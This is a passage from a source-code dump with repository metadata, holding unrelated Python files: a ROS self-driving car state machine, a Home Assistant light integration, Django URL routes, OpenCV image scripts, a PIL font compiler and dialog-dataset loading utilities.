from xycar_msgs.msg import xycar_motor
from sensor_msgs.msg import Image, LaserScan
from std_msgs.msg import Int32MultiArray
from darknet_ros_msgs.msg import BoundingBoxes
from visualization_msgs.msg import Marker, MarkerArray
from ar_track_alvar_msgs.msg import AlvarMarkers
from tf.transformations import euler_from_quaternion
from image_processing_module import *
from yolo_module import *
from drive_module import *
from ultra_module import *
from ar_module import *
from lidar_module import *
### module handles shared between init() and the ROS callbacks ###
# NOTE(review): `global` statements at module level are no-ops in Python;
# these lines only document the names that init() will assign.
global imageProcessModule
global yoloModule
global driveModule
global ultraModule
global arModule

### state flags used by the main driving loop ###
global find_stopline  # stop-line detection on/off
global find_traffic  # traffic-light detection on/off
global find_ar
global do_T_parking
global do_yolo_stop
global mode
global cut_in
global class_name
def init():
    """Create the helper modules, reset the driving-state flags, and wire
    up the ROS node with its subscribers."""
    ## declare shared module handles, state flags; register subscribers
    global imageProcessModule
    global yoloModule
    global driveModule
    global ultraModule
    global arModule
    global lidarModule
    global find_stopline  # stop-line detection on/off
    global find_traffic  # traffic-light detection on/off
    global find_ar
    global do_T_parking
    global do_yolo_stop
    global mode
    global cut_in
    global yolo_person
    global class_name
    imageProcessModule = ImageProcessingModule()
    yoloModule = YoloModule()
    driveModule = DriveModule()
    ultraModule = UltraModule()
    arModule = ArModule()
    lidarModule = LidarModule()
    find_stopline = True#False  # stop-line detection on/off
    find_traffic = True#False #True  # traffic-light detection on/off
    find_ar = True
    do_T_parking = False
    do_yolo_stop = True#False
    mode = '2'
    cut_in = True
    yolo_person = True
    class_name = 'person'
    rospy.init_node('main')
    # Sensor topics: camera, ultrasonic array, AR tags, lidar, YOLO boxes.
    rospy.Subscriber("/usb_cam/image_raw", Image, img_callback)
    rospy.Subscriber('xycar_ultrasonic', Int32MultiArray, ultra_callback)
    rospy.Subscriber('ar_pose_marker', AlvarMarkers, ar_callback)
    rospy.Subscriber('scan', LaserScan, lidar_callback)
    rospy.Subscriber("/darknet_ros/bounding_boxes", BoundingBoxes, yolo_callback)
def sensor_check():
    """Busy-wait until the camera, ultrasonic and lidar all deliver data."""
    global imageProcessModule
    global ultraModule
    expected_bytes = 640 * 480 * 3  # one full RGB frame from the USB camera
    while True:
        camera_ready = imageProcessModule.get_image_size() == expected_bytes
        # Short-circuit keeps the original evaluation order: camera first,
        # then ultrasonic, then lidar.
        if camera_ready and ultraModule.get_data() and lidarModule.get_data():
            break
### ROS subscriber callbacks: each simply caches the latest message ###
def img_callback(data):
    """Store the newest camera frame in the image-processing module."""
    global imageProcessModule
    imageProcessModule.set_image(data)
def ultra_callback(data):
    """Store the newest ultrasonic readings."""
    global ultraModule
    ultraModule.set_data(data)
def ar_callback(data):
    """Store the newest AR-marker detections."""
    global arModule
    arModule.set_arData(data)
def lidar_callback(data):
    """Store the newest lidar scan."""
    global lidarModule
    lidarModule.set_lidarData(data)
def yolo_callback(data):
    """Store the newest YOLO bounding boxes."""
    global yoloModule
    yoloModule.set_boxdata(data)
# Main driving loop: a per-mode state machine. Every iteration computes a
# default steering command from the lane-follow pipeline, lets the active
# mode override it, and finally publishes the command via driveModule.drive().
if __name__ == '__main__':
    init()
    sensor_check()
    print('==============')
    print('= mode 1 =')
    print('==============')
    while not rospy.is_shutdown():
        global imageProcessModule
        global yoloModule
        global driveModule
        global ultraModule
        global find_stopline
        global find_traffic
        global find_ar
        global do_T_parking
        global do_yolo_stop
        global mode
        global cut_in
        global class_name

        # NOTE(review): mode is forced to '7' on every iteration, so the
        # branches for modes 1-6 below are unreachable -- this looks like
        # scaffolding for testing the final-parking stage; confirm intent.
        mode = '7'
        print("MODE: " + mode)

        # Default command: follow the lane via the Hough-line pipeline.
        cte, fail_count = imageProcessModule.get_cte()
        angle, speed = driveModule.Hough_drive(cte, fail_count)  # basic lane following
        #print ('imageProcessModule.get_corner_count', imageProcessModule.get_corner_count())
        if mode == '1':  # start ~ before the first intersection
            speed = 30  #30
            if find_traffic:
                # Hold position until the first traffic light allows us to go.
                if not imageProcessModule.get_traffic_light('first'):
                    angle, speed = 0, 0
                else:
                    find_traffic = False
            elif cut_in:
                speed, cut_in = driveModule.cut_in(imageProcessModule.get_road_width(), ultraModule.get_data())
            else:  # normal driving
                speed = 20
                if imageProcessModule.get_corner_count() == 1:
                    mode = '2'
                    find_stopline = True  # about to enter the intersection: stop-line detection on
                    find_traffic = True  # traffic-light detection on
                    print('==============')
                    print('= mode 2 =')
                    print('==============')
        elif mode == '2':  # intersection + T-parking + YOLO stage
            #print('ardata : ', arModule.get_ardata())
            #find_stopline, find_traffic = False, False
            speed = 15
            if find_stopline:
                if imageProcessModule.detect_stopline():  # when the stop line appears
                    driveModule.stop_nsec(1)  # stop for 1 second
                    find_stopline = False
            elif find_traffic:
                if not imageProcessModule.get_traffic_light('second'):
                    angle, speed = driveModule.stop()
                else:
                    find_traffic = False
            elif find_ar and arModule.is_ar():
                print(arModule.get_distance())
                find_ar = False
                do_T_parking = True
            elif do_T_parking:
                driveModule.start_T_parking()
                driveModule.T_parking(arModule.get_distance(), arModule.get_arctan())
                '''
                if not arModule.finish_T_parking():
                    while arModule.finish_T_parking():
                        print('again T parking')
                        driveModule.again_T_parking(arModule.get_distance(), arModule.get_arctan())
                '''
                driveModule.end_T_parking(arModule.get_arctan())
                do_T_parking = False
                # Remember the corner count when parking finished; used below
                # to tell when the next intersection has been reached.
                intersec = imageProcessModule.get_corner_count()
            else:
                yolo_size = yoloModule.get_size(class_name)
                #print('yolo_size: ', yolo_size)
                if do_yolo_stop and yolo_size != None:
                    print('***** start yolo drive *****')
                    do_yolo_stop, class_name = driveModule.yolo_drive(angle, class_name, yolo_size)
                # NOTE(review): `intersec` is only assigned in the do_T_parking
                # branch above; if that branch never ran, this comparison
                # raises NameError -- confirm the intended ordering.
                if not do_yolo_stop and imageProcessModule.get_corner_count() - intersec > 2:  # entering the next intersection
                    find_stopline = True
                    mode = '3'
        elif mode == '3':  # after the intersection ~ before the hill
            speed = 15
            if imageProcessModule.detect_slope():
                driveModule.slope_drive(angle)  # drive over the hill
                mode = '4'
        elif mode == '4':  # after the hill ~ before the rotary
            if find_stopline:
                speed = 15
                if imageProcessModule.detect_stopline():  # when the stop line appears
                    driveModule.stop_nsec(1)  # stop for 1 second
                    find_stopline = False
                    print('stopline!')
            else:
                if lidarModule.can_rotary_in():  # wait until entering the rotary is safe
                    mode = '5'
                else:
                    speed = 0
        elif mode == '5':  # inside the rotary
            if lidarModule.forward_obstacle():
                speed = 0
                print(lidarModule.get_data())
            if lidarModule.end_rotary():  # end condition: parking AR-tag pose or lane geometry
                mode = '6'
        elif mode == '6':  # obstacle (car) avoidance
            speed = 10
            lpos, rpos = imageProcessModule.get_lane_pos()
            angle = yoloModule.car_avoid(lpos, rpos)
            print(arModule.get_distance())
            if 1.3 < arModule.get_distance() < 1.5:  # e.g. judged from the parking AR-tag pose
                mode = '7'
                find_stopline = True
        else:
            # Final stage: stop line -> traffic light -> parallel parking.
            if find_stopline:
                if imageProcessModule.detect_stopline_final():
                    driveModule.stop_nsec(1)
                    find_stopline = False
                    find_traffic = True
            elif find_traffic:
                speed = 0
                if imageProcessModule.get_traffic_light('first'):
                    find_traffic = False
            else:
                if imageProcessModule.detect_parkinglot():
                    driveModule.stop_nsec(1)
                    if not ultraModule.right_obstacle():
                        driveModule.parallel_parking()
                        driveModule.stop_nsec(1)
                        print('##### finish! #####')
                        break
        driveModule.drive(angle, speed)
| [
"kbs907@naver.com"
] | kbs907@naver.com |
26b37fb1f6de95098a60273063f8127dfa9cd6ee | 9e335834e7be81068f001d5451781d5c1530ebbf | /LearnPythonTHW/ex15.py | bf759b93985340432ebf224960e5e9315db9f325 | [] | no_license | jtr109/SelfLearning | c1dbffa5485d0cd2f444ea510da62a8e3d269dbc | cc920ed507647762b9855385be76869adac89e7c | refs/heads/master | 2020-04-06T04:11:31.143688 | 2016-07-22T02:19:39 | 2016-07-22T02:19:39 | 58,049,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | # -*- coding: utf-8 -*-
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's your file %r:" % filename
print txt.read()
print "Type the filename again:"
file_again = raw_input("> ")
txt_again = open(file_again)
print txt_again.read()
| [
"lyp_login@outlook.com"
] | lyp_login@outlook.com |
eb5f2cf86ec088fe0044bbd729282c46ce185b5e | eb64b799ff1d7ef3a244bf8e6f9f4e9118d5cfcd | /homeassistant/components/freedompro/light.py | 95731da914e47175459ea54202f980d23b6451cc | [
"Apache-2.0"
] | permissive | JeffLIrion/home-assistant | 53966b81b5d5816679f12fc761f79e8777c738d6 | 8f4ec89be6c2505d8a59eee44de335abe308ac9f | refs/heads/dev | 2023-08-22T09:42:02.399277 | 2022-02-16T01:26:13 | 2022-02-16T01:26:13 | 136,679,169 | 5 | 2 | Apache-2.0 | 2023-09-13T06:59:25 | 2018-06-09T00:58:35 | Python | UTF-8 | Python | false | false | 4,138 | py | """Support for Freedompro light."""
import json
from pyfreedompro import put_state
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_HS_COLOR,
COLOR_MODE_BRIGHTNESS,
COLOR_MODE_HS,
COLOR_MODE_ONOFF,
LightEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers import aiohttp_client
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from .const import DOMAIN
async def async_setup_entry(
    hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
    """Set up Freedompro light entities for a config entry."""
    coordinator = hass.data[DOMAIN][entry.entry_id]
    api_key = entry.data[CONF_API_KEY]
    # Only devices reported as light bulbs become light entities.
    lightbulbs = (dev for dev in coordinator.data if dev["type"] == "lightbulb")
    async_add_entities(Device(hass, api_key, dev, coordinator) for dev in lightbulbs)
class Device(CoordinatorEntity, LightEntity):
    """Representation of an Freedompro light."""

    def __init__(self, hass, api_key, device, coordinator):
        """Initialize the Freedompro light."""
        super().__init__(coordinator)
        self._session = aiohttp_client.async_get_clientsession(hass)
        self._api_key = api_key
        self._attr_name = device["name"]
        self._attr_unique_id = device["uid"]
        self._attr_device_info = DeviceInfo(
            identifiers={
                (DOMAIN, self.unique_id),
            },
            manufacturer="Freedompro",
            model=device["type"],
            name=self.name,
        )
        # Assume off/dark until the first coordinator update arrives.
        self._attr_is_on = False
        self._attr_brightness = 0
        # Pick the richest color mode the device's characteristics support:
        # hue+saturation > brightness-only > plain on/off.
        color_mode = COLOR_MODE_ONOFF
        if "hue" in device["characteristics"]:
            color_mode = COLOR_MODE_HS
        elif "brightness" in device["characteristics"]:
            color_mode = COLOR_MODE_BRIGHTNESS
        self._attr_color_mode = color_mode
        self._attr_supported_color_modes = {color_mode}

    @callback
    def _handle_coordinator_update(self) -> None:
        """Handle updated data from the coordinator."""
        # Find this entity's record in the coordinator's latest snapshot.
        device = next(
            (
                device
                for device in self.coordinator.data
                if device["uid"] == self._attr_unique_id
            ),
            None,
        )
        if device is not None and "state" in device:
            state = device["state"]
            if "on" in state:
                self._attr_is_on = state["on"]
            if "brightness" in state:
                # API reports brightness 0-100; Home Assistant uses 0-255.
                self._attr_brightness = round(state["brightness"] / 100 * 255)
            if "hue" in state and "saturation" in state:
                self._attr_hs_color = (state["hue"], state["saturation"])
        super()._handle_coordinator_update()

    async def async_added_to_hass(self) -> None:
        """When entity is added to hass."""
        await super().async_added_to_hass()
        # Seed entity state from whatever the coordinator already holds.
        self._handle_coordinator_update()

    async def async_turn_on(self, **kwargs):
        """Async function to set on to light."""
        payload = {"on": True}
        if ATTR_BRIGHTNESS in kwargs:
            # Convert Home Assistant's 0-255 brightness to the API's 0-100.
            payload["brightness"] = round(kwargs[ATTR_BRIGHTNESS] / 255 * 100)
        if ATTR_HS_COLOR in kwargs:
            payload["saturation"] = round(kwargs[ATTR_HS_COLOR][1])
            payload["hue"] = round(kwargs[ATTR_HS_COLOR][0])
        payload = json.dumps(payload)
        await put_state(
            self._session,
            self._api_key,
            self._attr_unique_id,
            payload,
        )
        # Pull fresh state so the UI reflects the change promptly.
        await self.coordinator.async_request_refresh()

    async def async_turn_off(self, **kwargs):
        """Async function to set off to light."""
        payload = {"on": False}
        payload = json.dumps(payload)
        await put_state(
            self._session,
            self._api_key,
            self._attr_unique_id,
            payload,
        )
        await self.coordinator.async_request_refresh()
| [
"noreply@github.com"
] | JeffLIrion.noreply@github.com |
87b10db60bedbe9be2a069f490c9007cf0d4cdfc | 4683ab4a90067ff7c2f7c3b952eb8268713ca1b8 | /meteoweb/urls.py | decc0a8d5973c7ba42c84287180df9f7d86a5276 | [] | no_license | karpov-sv/favor2 | 068fda8c0acbd54bbec1e57c69617e0e60bc462e | 668085a495436888a7b031bdf6b161908f6d73cc | refs/heads/master | 2023-04-26T01:52:22.621648 | 2021-05-13T11:46:50 | 2021-05-13T11:46:50 | 285,786,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,323 | py | from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.conf.urls import patterns, include, url
from django.views.generic import DetailView, ListView
from django.db.models import Count
from models import *
from views import *
urlpatterns = patterns('',
    # List of nights with some statistical info (image count per night)
    url(r'^nights/?$', ListView.as_view(
        queryset=MeteoImages.objects.order_by('-night').values('night').annotate(nimages=Count('night')),
        context_object_name='nights',
        template_name='nights.html'),
        name='nights'),

    # Log view
    url(r'^$', 'meteoweb.views.current', name='current'),
    url(r'^current.jpg$', 'meteoweb.views.current_image', name='current_image'),

    # List of images with previews, optionally filtered by night and/or type
    url(r'^images(/(night/(?P<night>\w+))?)?(/(?P<type>\w+))?$', ImagesListView.as_view(), name='images_night'),
    # Detailed image view
    url(r'^images/(?P<pk>\d+)/$', ImageDetailView.as_view(), name='images'),

    # Viewing and downloading image itself (full-size JPEG and small preview)
    url(r'^images/(?P<id>\d+)/view', 'meteoweb.views.image_jpeg', {'size' : 800}, name="image_view"),
    url(r'^images/(?P<id>\d+)/preview', 'meteoweb.views.image_jpeg', {'size' : 64}, name="image_preview"),

    # Sky Quality Meter plot
    url(r'^sqm/(?P<field>\w+)/current.jpg', 'meteoweb.views.current_sqm', {'size': 1000, 'field': 'brightness'}, name='current_sqm'),

    # Boltwood Cloud Sensor II plot
    # NOTE(review): this pattern reuses name='current_sqm' from the entry
    # above; reverse() can only resolve one of them -- confirm whether a
    # distinct name was intended.
    url(r'^meteo/(?P<field>\w+)/current.jpg', 'meteoweb.views.current_meteo', {'size': 1000}, name='current_sqm'),

    # Tabular output
    url(r'^current.txt', 'meteoweb.views.current_table', name='current_table'),

    # Robots: disallow all crawling
    url(r'^robots.txt$', lambda r: HttpResponse("User-agent: *\nDisallow: /", mimetype="text/plain")),
)

urlpatterns += staticfiles_urlpatterns()
| [
"karpov.sv@gmail.com"
] | karpov.sv@gmail.com |
dc07e2cccb0fdb9ae7c3fbd8dc0d06b9049e4223 | f52db9779023c3a007bf7f712dada1ae30307366 | /edge_detect.py | dd4f7e948bff7c4c4084eafee9b4b6f7204020c5 | [] | no_license | hemangdtu/Newtons_Rings_IR_Algorithm | 16b86f9d7490e0f560f59f81b0137b706c979ab5 | dd494aa8d363c9d8b6bb83cff59ef860c3727e48 | refs/heads/master | 2023-04-07T09:02:59.885671 | 2021-04-08T07:18:55 | 2021-04-08T07:18:55 | 354,702,917 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,043 | py | import cv2
import numpy as np
from matplotlib import pyplot as plt
from scipy.signal import argrelmin
import sys
#read input image, resize it if needed, and apply a basic gaussian blur to remove
#high-frequency noise
img = cv2.imread("test_1.jpg",0)
img = cv2.resize(img,(0,0), fx=1,fy=1)
img = cv2.medianBlur(img,5)
#rescale color space from rbg to bw
cimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)
bwimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)
#apply the hough transform to obtain detected circles in the image
#circles should be an array with each element of the form [xpos, ypos, radius]
# NOTE(review): HoughCircles returns None when nothing is detected; the
# np.uint16 call below would then raise — confirm inputs always contain circles.
circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,5,50,param1=110,param2=80,minRadius=40,maxRadius=0)
circles = np.uint16(np.around(circles))
#obtain the center of the image for size calculations
center = np.array(np.shape(img)) / 2.0
# iterate through all circles found, and draw those within a certain radius of the center of the image
# to filter out the stuff we don't want
# also choose one of these circles to be the one we use, and save it's center point -- This is a bit of a bodge, as it simply
# pulls a random circle - in theory, this is the only one that should be found, but this isn't always certain depending on noise
trueCenter = None
for i in circles[0]:
    # keep the circle whose center lies within 35 px of the image center
    if((np.abs(i[1] - center[0]) ** 2 + np.abs(i[0] - center[1]) ** 2) ** 0.5 < 35 ):
        trueCenter = i
    # draw the outer circle
    cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)
    # draw the center of the circle
    cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)
#transform to polar and draw image - do this twice, once for the image to display,
#and once for the one to do the math on (which should not have debug graphics - eg the center of the circle drawn)
# NOTE(review): if no circle passed the distance filter, trueCenter is still
# None here and the indexing below raises TypeError — consider a guard.
size = int(np.shape(img)[0]/2)
dst = cv2.warpPolar(cimg,(size,size), (trueCenter[0],trueCenter[1]), maxRadius= size, flags = cv2.WARP_POLAR_LINEAR)
dst2 = cv2.warpPolar(bwimg,(size,size), (trueCenter[0],trueCenter[1]), maxRadius= size, flags = cv2.WARP_POLAR_LINEAR)
#plot intensities and figures
fig = plt.figure()
plt.subplot(2, 2, 1)
plt.imshow(cimg)
plt.subplot(2, 2, 2)
#plot pixel intensities from center to the side of the image (bad way)
plt.plot(range(0,len(bwimg[trueCenter[1]]))[trueCenter[0]:],[i[1] for i in bwimg[trueCenter[1]]][trueCenter[0]:])
plt.subplot(2, 2, 3)
plt.imshow(dst)
plt.subplot(2, 2, 4)
#Find the average value of each column in the transformed image, and plot that value instead (better way)
plt.xlabel("Pixel Distance")
plt.ylabel("Average Intensity")
average_val = [sum([dst2[j][i][1] for j in range(0,len(dst[i]))]) / len(dst[i]) for i in range(0, len(dst))]
plt.plot(range(0,len(dst)), average_val)
#find local minima, and plot those on the graph. also print them (pixel distances)
mins = argrelmin(np.array(average_val), order=1)
plt.plot(mins[0][1:],[average_val[i] for i in mins[0][1:]], 'gx')
# write the first eleven minima (pixel distances, one per line) to output.txt
file1 = open(r"output.txt","w")
# [print(i) for i in mins[0][1:12]]
for i in mins[0][1:12]:
    file1.write(str(i)+"\n")
file1.close()
plt.show()
| [
"noreply@github.com"
] | hemangdtu.noreply@github.com |
50c7ce0573bcae59abf94a12ef429ee067e6955a | c44b0322e47dcf52b3b542a0806f96fb22cb3e7f | /hacker_rank/spiral_print.py | b8435f02b0b96ad580adceaf90922310c19dd8a4 | [] | no_license | jcshott/interview_prep | b56a332f5c9a8d68d81afbb541911d70afb9fe35 | 567eb1e7b047f1917c008dd1eec98acf8043a7e7 | refs/heads/master | 2020-04-06T07:05:57.788289 | 2016-08-02T16:46:52 | 2016-08-02T16:46:52 | 42,322,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | # Enter your code here. Read input from STDIN. Print output to STDOUT
def print_spiral(matrix):
    """Print the elements of *matrix* in clockwise spiral order, comma-separated.

    Args:
        matrix: rectangular list of lists of strings (row-major).

    Improvements over the original: Python-2 ``print`` statements replaced
    with a py2/py3-compatible call, and the fragile boundary bookkeeping
    (whose bottom-row range was only correct for square matrices) replaced
    with the standard four-sweep shrink-the-window traversal.
    """
    output = []
    top, bottom = 0, len(matrix) - 1
    left, right = 0, len(matrix[0]) - 1
    while top <= bottom and left <= right:
        # top row, left -> right
        for c in range(left, right + 1):
            output.append(matrix[top][c])
        top += 1
        # right column, top -> bottom
        for r in range(top, bottom + 1):
            output.append(matrix[r][right])
        right -= 1
        # bottom row, right -> left (only if an unvisited row remains)
        if top <= bottom:
            for c in range(right, left - 1, -1):
                output.append(matrix[bottom][c])
            bottom -= 1
        # left column, bottom -> top (only if an unvisited column remains)
        if left <= right:
            for r in range(bottom, top - 1, -1):
                output.append(matrix[r][left])
            left += 1
    print(",".join(output))
# build matrix
# NOTE(review): raw_input is Python 2 only; under Python 3 this driver needs
# input() instead. First stdin line is "rows,cols"; each following line is a
# comma-separated row of the matrix.
matrix_size = raw_input().split(",")
_matrix = []
for x in range(int(matrix_size[0])):
    row = raw_input().split(",")
    _matrix.append(row)
print_spiral(_matrix)
| [
"jcshott@gmail.com"
] | jcshott@gmail.com |
f6b95fd1f667cbd84a3615a2192f85e37e2fa813 | 1b80c265ea585a9d96646afb40093a87874d09ca | /practises/test.py | fb134db5939d70d6f9023336f5d5f53795ffec18 | [] | no_license | gtopcular/OPENCVPRACTISE | 4e45e637d15d7d0968dbc881f89dd63678512df6 | 9b119e20371c0f8ad8724974f37301d5454e4cd2 | refs/heads/master | 2022-07-24T03:03:58.574445 | 2020-05-25T10:52:59 | 2020-05-25T10:52:59 | 255,631,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | import cv2
# Load the image in grayscale (flag 0).
# Bug fix: the original path literal mixed quote styles ("./sources/helikopter.jpg'),
# which is a SyntaxError; the quotes are now matched.
img = cv2.imread('./sources/helikopter.jpg', 0)
cv2.imshow('helikopter.jpg', img)
dugme = cv2.waitKey(0)  # block until a key is pressed
if dugme == 27:  # ESC: close the window without saving
    cv2.destroyAllWindows()
else:
    # Any other key: save the grayscale copy.
    cv2.imwrite("gri_helikopter.jpg", img)
"gtopcular@hotmail.com"
] | gtopcular@hotmail.com |
07a7bc52717aa5b1417895ba4f41a774881dd48b | d8bf91fc51b4fd05246097e5c7e5aa07771b1068 | /myenv/bin/pilfont.py | b091656756f12cc2c63007772af750d1c659a489 | [] | no_license | falcon1996/Gallery | 9d51bfba32fe06600a9b49991c99c106003a945f | e1c37d1e7cd02d1d878d5ea0107292248e4fdce9 | refs/heads/master | 2021-06-17T04:16:14.233354 | 2017-04-23T00:29:57 | 2017-04-23T00:29:57 | 82,963,158 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | #!/home/dhruv/Documents/galleryProject/myenv/bin/python3
#
# The Python Imaging Library
# $Id$
#
# PIL raster font compiler
#
# history:
# 1997-08-25 fl created
# 2002-03-10 fl use "from PIL import"
#
from __future__ import print_function
import glob
import sys
# drivers
from PIL import BdfFontFile
from PIL import PcfFontFile
VERSION = "0.4"
# No font files given: print usage and exit with a non-zero status.
if len(sys.argv) <= 1:
    print("PILFONT", VERSION, "-- PIL font compiler.")
    print()
    print("Usage: pilfont fontfiles...")
    print()
    print("Convert given font files to the PIL raster font format.")
    print("This version of pilfont supports X BDF and PCF fonts.")
    sys.exit(1)
# Expand shell-style wildcards in each argument into a flat file list.
files = []
for f in sys.argv[1:]:
    files = files + glob.glob(f)
for f in files:
    print(f + "...", end=' ')
    try:
        fp = open(f, "rb")
        # Try the PCF parser first; on a SyntaxError rewind and fall back to BDF.
        try:
            p = PcfFontFile.PcfFontFile(fp)
        except SyntaxError:
            fp.seek(0)
            p = BdfFontFile.BdfFontFile(fp)
        p.save(f)
    except (SyntaxError, IOError):
        print("failed")
    else:
        print("OK")
| [
"dhruvparashar6@gmail.com"
] | dhruvparashar6@gmail.com |
0421a604d86c26b00cb7894e3a3d2bac5afddb39 | b12d2e8d296f8ca6ac72acfae65566e9c2f65e0d | /scripts/data_utils.py | 5952a24aaba2223c962be20ad30849ad9611140a | [] | no_license | yyincc/experiment1_hie_dstc2 | 6380210c92bc69b64a0dd1d82a65ab70e25f64e2 | d6f4f896a8d2889ea6b059d70331ac3f3fb3482b | refs/heads/master | 2020-03-25T22:00:30.664020 | 2018-08-11T20:38:00 | 2018-08-11T20:38:00 | 144,200,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,592 | py |
import numpy as np
import json
from itertools import chain
import re
from sklearn.model_selection import train_test_split
import operator
from copy import deepcopy
from functools import reduce
from spacy.lang.en import English
from score import do_compute_score, do_load_json_result
import gensim
from tqdm import tqdm
### The current dialog format
### [{dialog_id : " ",
#     utterances: [" "],
#     candidates: [{candidate_id: " " , utterance: ""}, ... ],
#     answer: {candidate_id: " " , utterance: ""} ]
# Module-level spaCy English tokenizer, shared by tokenize() and get_stories().
nlp=English()
def load_task(path_to_data, FLAGS, cand_idx_out=None):
    """Load dialog JSON files and convert them into story dicts.

    Args:
        path_to_data: iterable of JSON file paths; their contents are concatenated.
        FLAGS: config object providing speaker_info, time_info_sents, user_in
            and main_task attributes.
        cand_idx_out: unused; kept for backward compatibility. (Was a mutable
            ``{}`` default, which is a Python anti-pattern.)

    Returns:
        (train, []) — the parsed stories plus an empty placeholder for the
        validation split that is no longer produced here.
    """
    json_data = []
    for task_dir in path_to_data:
        # Context manager guarantees the handle is closed even on errors.
        with open(task_dir, 'rb') as fd:
            json_data += json.load(fd)
    train = get_stories(json_data, FLAGS.speaker_info, FLAGS.time_info_sents,
                        user_in=FLAGS.user_in)
    if FLAGS.main_task == 'slot_tracking':
        # Keep only dialogs whose gold answer starts with an api_call token.
        train = [t for t in train if str(t['a'][0]) == 'api_call']
    # train, val = train_test_split(train, test_size=0, random_state=FLAGS.random_state)
    return train, []
def process(dataset):
    """Tokenize, in place, the 'utterances', 'user' and 'bot' fields of every story.

    Each stored item is replaced by the token list of its first element
    (items are assumed to be 1-element sequences — TODO confirm against callers).
    """
    for id in range(len(dataset)):
        utterances=dataset[id]['utterances']
        user=dataset[id]['user']
        bot=dataset[id]['bot']
        dataset[id]['utterances']=[]
        dataset[id]['user']=[]
        dataset[id]['bot']=[]
        for i in range(len(utterances)):
            dataset[id]['utterances'].append(tokenize(utterances[i][0]))
        for i in range(len(user)):
            dataset[id]['user'].append(tokenize(user[i][0]))
        for i in range(len(bot)):
            dataset[id]['bot'].append(tokenize(bot[i][0]))
def load_test(path_to_data, FLAGS):
    """Load test dialog JSON files and convert them into story dicts.

    Mirrors load_task() but returns only the story list (no split tuple).
    """
    json_data = []
    for task_dir in path_to_data:
        fd = open(task_dir, 'rb')
        json_data += json.load(fd)
        fd.close()
    test = get_stories(json_data, FLAGS.speaker_info, FLAGS.time_info_sents,user_in=FLAGS.user_in)
    if FLAGS.main_task=='slot_tracking':
        # Same filter as load_task: keep only api_call dialogs.
        test=[t for t in test if str(t['a'][0]) == 'api_call']
    return test
def loadEmbedding_rand(path, word_indices, binary, divident = 1.0): # TODO double embedding
    """
    Build a (len(word_indices)+1, 300) float32 embedding matrix.

    Rows are first initialized from a normal distribution scaled by 1/divident
    (row 0, the padding index, is zeroed), then overwritten with pretrained
    word2vec vectors for every in-vocabulary word when *path* is given.
    Words missing from the pretrained model keep their random init (and are
    printed for debugging).
    """
    n = len(word_indices)
    m = 300
    emb = np.empty((n+1, m), dtype=np.float32)
    emb[:,0:300] = np.random.normal(size=(n+1,300)) / divident
    # Index 0 is reserved for padding and stays all-zero.
    emb[0, :] = np.zeros((1,m), dtype="float32")
    if path !=None:
        model = gensim.models.KeyedVectors.load_word2vec_format(path, binary=binary)
        for word in word_indices.keys():
            try:
                emb[word_indices[word], 0:300] = model[word]
            except KeyError:
                # OOV for the pretrained model: keep the random row.
                print(word)
                continue
    return emb
def get_stories(json_data,speaker_info, time_info_sents, user_in=False, testing=False):
    '''Parse stories provided in the tasks format.

    For each dialog, builds:
      - 'utterances': all turns but the last, each optionally prefixed with a
        time token (time_info_sents) and/or a speaker token (speaker_info);
        with user_in, user turns are additionally appended without prefixes.
      - 'history': the same turns tokenized without prefixes.
      - 'a': the tokenized gold answer (empty when testing=True).
    NOTE(review): the last turn is tokenized into `q` below but `q` is never
    stored in storyInfo — confirm whether that is intentional.
    '''
    data = []
    for story in tqdm(json_data):
        utterances_origin = story['utterances']
        utterances_list = []
        a_list = []
        utterances_list.append(utterances_origin)
        a_list.append( tokenize(story['answer']['utterance']) )
        utterances_list_counter = 0
        for utterances in utterances_list:
            storyInfo = {}
            utter_list = []
            history=[]
            utter_counter = 0
            speaker_type_list, time_list = get_add_info(utterances)
            # All turns except the final user question.
            for utter in utterances[:len(utterances)-1]:
                add_item = []
                if time_info_sents: add_item += [time_list[utter_counter]]
                if speaker_info: add_item += [speaker_type_list[utter_counter]]
                utter_list.append(add_item+[token.text for token in nlp(utter)])
                history.append(tokenize(utter))
                if user_in:
                    # Duplicate user turns without the prefix tokens.
                    if '$user' in add_item:
                        utter_list.append(tokenize(utter))
                    else:
                        utter_list.append(add_item+tokenize(utter))
                utter_counter += 1
            # add item to last question from user
            add_item_q = []
            if time_info_sents: add_item_q += [time_list[-1]]
            if speaker_info: add_item_q += ['speaker_user']
            #q = add_item_q + [token.text for token in nlp(utterances[len(utterances)-1])]
            q = add_item_q + tokenize(utterances[len(utterances)-1])
            a = a_list[utterances_list_counter] if not testing else []
            storyInfo['dialog_id'] = story['dialog_id']
            storyInfo['history'] = history
            storyInfo['utterances'] = utter_list
            storyInfo['a'] = a
            data.append(storyInfo)
            utterances_list_counter += 1
    return data
def get_add_info(utterances):
    """
    Return (speaker_type_list, time_list) for each utterance of a dialog.

    KB option lines (see is_option) get speaker '$options' and time 'time-api';
    other turns alternate '$user'/'$bot' and share one 'timeN' tag per
    user+bot exchange (N = ceil(turn/2)).
    """
    time_list = []
    speaker_type_list = []
    speaker_type = ["$user", "$bot", '$options']
    start = 0  # NOTE(review): unused variable.
    counter = 0  # counts only non-option turns, so options don't shift speakers
    for utter in utterances:
        token = tokenize(utter)
        if is_option(token):
            speaker_type_list.append(speaker_type[2])
            time_list.append('time-api')
